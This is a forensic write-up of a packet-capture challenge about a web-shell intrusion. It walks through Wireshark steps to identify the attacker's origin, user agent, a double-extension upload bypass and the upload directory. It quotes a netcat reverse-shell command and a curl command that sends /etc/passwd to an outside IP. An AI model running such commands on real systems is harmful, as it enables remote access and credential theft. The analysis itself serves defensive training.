before starting with challenge we have to do something
first one open statistics then protocol hierarchy to see which protocols used in the packets
we will see tcp - http
second open statistics then conversation to see which ips connect with each other
we now ready for the challenge
Q1 Understanding the geographical origin of the attack aids in geo-blocking measures and threat intelligence analysis. What city did the attack originate from?
using ipgeoloction
ans Tianjin
Q2 Knowing the attacker's user-agent assists in creating robust filtering rules. What's the attacker's user agent?
using follow tcp stream we will get user agent for attacker
Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Q3 We need to identify if there were potential vulnerabilities exploited. What's the name of the malicious web shell uploaded?
first we will follow the http request ant we find a post request in packet number 53 and 63
in this challenge the attacker uploaded two web shell first one called image.php and the second called image.jpg.php
and in packet 53 image.php web shell he get invalid formate so its not worked (in this cause we can be guess the web site in this location of upload it only accepte a photos with ext jpg png or something like that so the attacker change the extention with image.jpg.php then its accept in packet 63
we will notice this command in php file nc 117.11.88.124 8080 that mean the attacke will open a connection in port 8080 using netcat tool (netcat tool the connection not encrypted like socat)
Q4 Knowing the directory where files uploaded are stored is important for reinforcing defenses against unauthorized access. Which directory is used by the website to store the uploaded files?
with following http stream we will see in packet 138 we will the web shell in path /reviews/uploads/image.jpg.php
after the attacker access this path he gain access to the machine and can write a commands on a machine victim
Q5 Identifying the port utilized by the web shell helps improve firewall configurations for blocking unauthorized outbound traffic. What port was used by the malicious web shell?
to know which port the attacker used for web shell we can detect it form the command wrote in php file nc 117.11.88.124 8080 so the port is 8080
Q6 Understanding the value of compromised data assists in prioritizing incident response actions. What file was the attacker trying to exfiltrate?
to know which file was the attacker trying to exfiltrate we have to go to packet 140 that includs all commands the attacker wrote in a victime machine
we will see this command curl -X POST -d /etc/passwd http://117.11.88.124:443/ curl is used in command lines or scripts to transfer data
then the file is passwd It contains a list of the system's accounts